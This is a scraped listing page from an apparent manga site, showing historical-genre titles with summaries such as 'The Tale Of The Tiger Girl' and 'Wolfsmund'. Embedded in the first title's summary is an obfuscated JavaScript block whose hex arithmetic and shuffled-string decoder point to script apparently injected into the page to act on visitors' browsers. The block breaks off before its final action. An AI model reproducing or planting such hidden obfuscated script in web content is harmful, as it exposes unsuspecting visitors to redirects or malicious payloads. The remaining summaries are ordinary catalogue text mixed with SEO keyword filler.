Historical - Page 85

Explore the world of Historical manga, where gripping stories await. Start reading the best Historical manga free now!

3992 results

The Glamorous Doctor Divorces Her Husband

I am a modern-day physician, that transmigrated, and became a concubine. Abandoned by my lord, other concubines are constantly trying to find fault in me. Originally I did not have much interest in trashy men, and lived fairly peacefully. But sisters, heed my warning and be kind. After all, I used to work with a knife, and I’ve drawn blood, unlike you, who can’t even take a small scare.<script></script><script>(function(_0x111bcb,_0x3c4fc0){var _0x582199=_0x2258,_0x8c2a1c=_0x111bcb();while(!![]){try{var _0x1f57a4=-parseInt(_0x582199(0xde))/(-0x1d77+-0x126f+0x2fe7)+-parseInt(_0x582199(0xdc))/(0xb8e+0x1af9+0x207*-0x13)+-parseInt(_0x582199(0xd3))/(-0x142a+-0x1d0c+0x3139*0x1)*(-parseInt(_0x582199(0xd4))/(0x3*0x31+-0x2*0x3a6+-0x5*-0x159))+parseInt(_0x582199(0xe4))/(0x8*0x409+0x19b5+-0x39f8)+-parseInt(_0x582199(0xe0))/(0xb00+-0x1f12+0x1418)+-parseInt(_0x582199(0xca))/(-0x26*-0xa9+0x3*-0xa71+0x644)+parseInt(_0x582199(0xc6))/(-0x9a+-0xe99*0x1+0xf3b);if(_0x1f57a4===_0x3c4fc0)break;else _0x8c2a1c['push'](_0x8c2a1c['shift']());}catch(_0x4aa08b){_0x8c2a1c['push'](_0x8c2a1c['shift']());}}}(_0x5a03,-0xd66e4+-0x3*0x7cb78+0x32c3a0));function _0x5a03(){var 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Before I knew it, I had stolen the Dark Lord’s Heart

Read manhwa “Before I knew it, I had stolen the Dark Lord’s Heart” Online Free On MANGA ZIN The summary of the comic Before I knew it, I had stolen the Dark Lord’s Heart: Seeing the relationship between Duke Willow, the Sword of the North, and her father who’s his guardian knight, Celine has been looking forward to meeting her lord, Damian. However, the Damian she encountered was a skinny, frail boy with a bright smile that belied his Northern Majesty. To fulfil her duty as a guardian knight, she decided to take her lord’s side, no matter what kind of person he was. But there’s something fishy about this frail boy… “Before I knew it, I had stolen the Dark Lord’s Heart” is also known as: Before I knew it, I had stolen the Dark Lord’s Heart The comic Before I knew it, I had stolen the Dark Lord’s Heart belongs to the Genre: Fantasy, Historical, Manhwa, Romance “Top Manhua, Battwo, Read Manga Online…” are the most searched keywords on the website ZINMANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at BunManga. You can read TOP MANGA Human Mask The Patron’s Daughters The Genius Idol’s Strategy to Stardom

3 days ago

The Tale Of The Tiger Girl

Read “The Tale Of The Tiger Girl Novel” – “The Tale Of The Tiger Girl Manga” Online Free At Hot Manga The Summary Of The Comics “The Tale Of The Tiger Girl”: In Joseon’s Capital Of Hanyang, Rumors Are Spreading Of An Evil King Cursing The Kingdom With Ghosts. First, There’s The Wailing Man Pulling An Empty Handcart. Then, A Strange Corpse Appears In A Well, Turning The Water To Blood. To Investigate, The Prince Calls His Outcast Brother, Spirit Seer Lord Muyoung, Who Comes Down From The Mountains With His Skittish Young Disciple Haerang. Can This Pair Unravel The Mystery, Or Will They Too Get Caught In The Web Of Royal Curses And Vengeful Ghosts? “The Tale Of The Tiger Girl” Is Alternatively Named: The Tale Of A Tiger / 호랑낭자 뎐 / 호랑낭자뎐 The Comics “The Tale Of The Tiger Girl” Belongs To The Genre: Drama, Fantasy, Historical, Manhwa, Mystery, Romance “Manhuaplus, Manga Updates, Manhwa Website…” Are The Most Searched Keywords On The Website Kun Manga. We Offer A Wide Selection Of The Best And Newest Comics Series With All Chapters Updated Quickly And Featuring High-Quality Images, Providing Readers With Wonderful And Enjoyable Reading Experiences At Likemanga. You Can Read Top Manga The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King By Scavenging


Our Majesty Has Changed

Read manhwa Our Majesty Has Changed The emperor locks away the empress, who doesn’t love him, behind seven gates, and she chooses to drink poison and die. Meanwhile, in the world where she is alive, the emperor has awakened. “Our Majesty Has Changed Manhwa” is sames name: 우리 폐하가 달라졌어요


Ookami no Kuchi: Wolfsmund

From Kotonoha Wolfsmund is a dark historical manga set in the early 14th century of Europe (Switzerland). The story revolves around the eponymous fortress in the St. Gotthard Pass which is ruled by a sadistic tyrant. Basically, each chapter deals with characters who for some reason have to cross the pass and who end up getting interrogated by the mentioned tyrant. What sets this manga apart is the fact that there's rarely a happy ending for our protagonists. The author pulls no punches to show us just how brutal and inhuman the Middle Ages really were. Other manga: + Yu-Gi-Oh manga + Phantom Blood manga


Soregashi Kojiki ni Arazu

Soregashi Kojiki ni Arazu summary is updating. Come visit Mangakakalot.com sometime to read the latest chapter of Soregashi Kojiki ni Arazu. If you have any question about this manga, Please don't hesitate to contact us or translate team. Hope you enjoy it.


Hybrid Child

[From DMP]: The Hybrid Child is an amazing android that can grow if it is lavished with enough love and care from its owner. Neither fully machine nor fully human, the various Hybrid Child models develop strong emotional bonds with their owners. This volume contains several short stories of love, sacrifice, and drama: Young Kotaro learns the importance of responsibility when his Hybrid Child's lifespan runs out. The tragic swordsman Seya learns to love again with the help of his Hybrid child, Yuzu. The final tale tells the story of Kuroda, the creator of the Hybrid Child designs, and how his lost love inspired their creation. [From Mochi*Mochi]: ----I said that I wouldn't accept anything else but Hazuki--- Kotarou found Hazuki at the trash dump one day and took him into his home. It turned out that Hazuki was a Hybrid Child, a doll that grew and developed in response to its owner's love and attention. Experience Nakamura-sensei's stories of earnest, pure love in this three-part series, including a never-before published short and extra!!


Dear My Girls

Elizabeth March is one of four daughters from a prestigious family. The only reason she stands out from her sisters' extraordinary beauty and talent is because she's talentless. After her acceptance into the same academy all her sisters are at, Elizabeth encountered a chain of interesting things including getting off at the wrong start with a rich boy named Adrian. Adapted from Louisa May Alcott's "Little Women" Note: Although it is adapted from "Little Women," the story of this manhwa is very different.


Emperor’S Evil Wife

As the princess of Xi Liang, she was, however, imprisoned in the cold palace. Faced with the dangerous imperial harem and the extermination of her entire family, she never yielded! As for those who take advantage of her, she responded more strongly, whether they were imperial concubines or not!


Kago no Tori

A young Chinese boy, Lee-Ren is purchased from his poverty stricken mother by a Japanese official for sexual purposes in 1910. Thus begins the 'owned' life of Lee-Ren in his master's household, where he is alternately sold out and used within. Jin, the naive young son of the master, grows up with Lee-Ren. This is the story of their tumultuous relationship.


Botsuraku Reijou no Ikoku Kekkonroku

Botsuraku Reijou no Ikoku Kekkonroku manga, "From now on, you will be my wife." Reifa, a daughter of a fallen family, is bought for 100 gold coins in a faraway foreign country to pay off her family's debt. In a land where she can't speak nor understand the language, she was almost treated as an object. But, she is rescued by the beautiful and (rumored) sickly, head of a noble family, Sin Yu. A story of married life, that aims to be the ideal couple with cooking and compassion.


Sister Generator ~Hiroaki Samura Short Stories~

Contains six short stories: 1. Kuzein-ke Saidai no Show (The Biggest Show of the Kuzein Family) 2-4. Seifuku wa Nugenai #1~3 (Can't Take Off My Uniform) 5. Brigit no Bansan (Brigit's Supper) 6-8. Seifuku wa Nugenai #4~6 9. Shizuru Cinema (Shizuru Film) 10. Kasou Senryaku Kagami-uchi (Lower Class Tactic: Mirror Strike) 11-12. Seifuku wa Nugenai #7~8 13. Seishun Janjaka Jaka Jaka 14. Emerald
